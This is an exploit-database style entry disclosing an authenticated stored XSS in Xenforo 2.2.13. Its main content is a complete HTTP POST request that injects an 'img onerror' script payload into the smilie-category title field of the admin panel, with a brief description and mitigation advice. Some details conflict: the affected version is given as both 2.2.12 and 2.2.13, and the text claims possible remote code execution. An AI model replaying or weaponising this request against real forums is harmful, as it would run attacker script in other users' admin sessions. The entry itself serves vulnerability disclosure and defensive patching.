header-logo
Suggest Exploit
vendor:
Xenforo
by:
Furkan Karaarslan
N/A
CVSS
HIGH
Authenticated Stored XSS
79
CWE
Product Name: Xenforo
Affected Version From: 2.2.12
Affected Version To: 2.2.13
Patch Exists: NO
Related CWE:
CPE: a:xenforo:xenforo:2.2.13
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
2023

Xenforo Version 2.2.13 – Authenticated Stored XSS

This exploit allows an attacker to inject malicious JavaScript code into the Xenforo version 2.2.13 application. The vulnerability exists in the 'title' parameter of the '/admin.php?smilie-categories/0/save' endpoint, which does not properly sanitize user input. An authenticated user can exploit this vulnerability by submitting a crafted request with a malicious payload in the 'title' parameter. When the page is viewed by another user, the payload will be executed, leading to potential remote code execution or other malicious activities.

Mitigation:

To mitigate this vulnerability, the vendor should release a patch that properly sanitizes user input in the affected endpoint. Until a patch is available, users can mitigate the risk by implementing input validation and output encoding to prevent malicious code execution.
Source

Exploit-DB raw data:

# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS
# Date: 2023-06-24
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: https://x.com/admin.php?smilies
# Version: 2.2.12 (REQUIRED)
# Tested on: Windows/Linux
# CVE : 

-----------------------------------------------------------------------------
Requests

POST /admin.php?smilie-categories/0/save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/admin.php?smilies/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422
Content-Length: 1038
Origin: http://127.0.0.1
Connection: close
Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"

1687616851,83fd2350307156281e51b17e20fe575b
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="title"

<img src=x onerror=alert(document.domain)>
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="display_order"

1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfRequestUri"

/admin.php?smilies/
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfWithData"

1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"

1687616849,b74724a115448b864ba2db8f89f415f5
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfResponseType"

json
-----------------------------333176689514537912041638543422--


Response: After it is created, an alert comes immediately.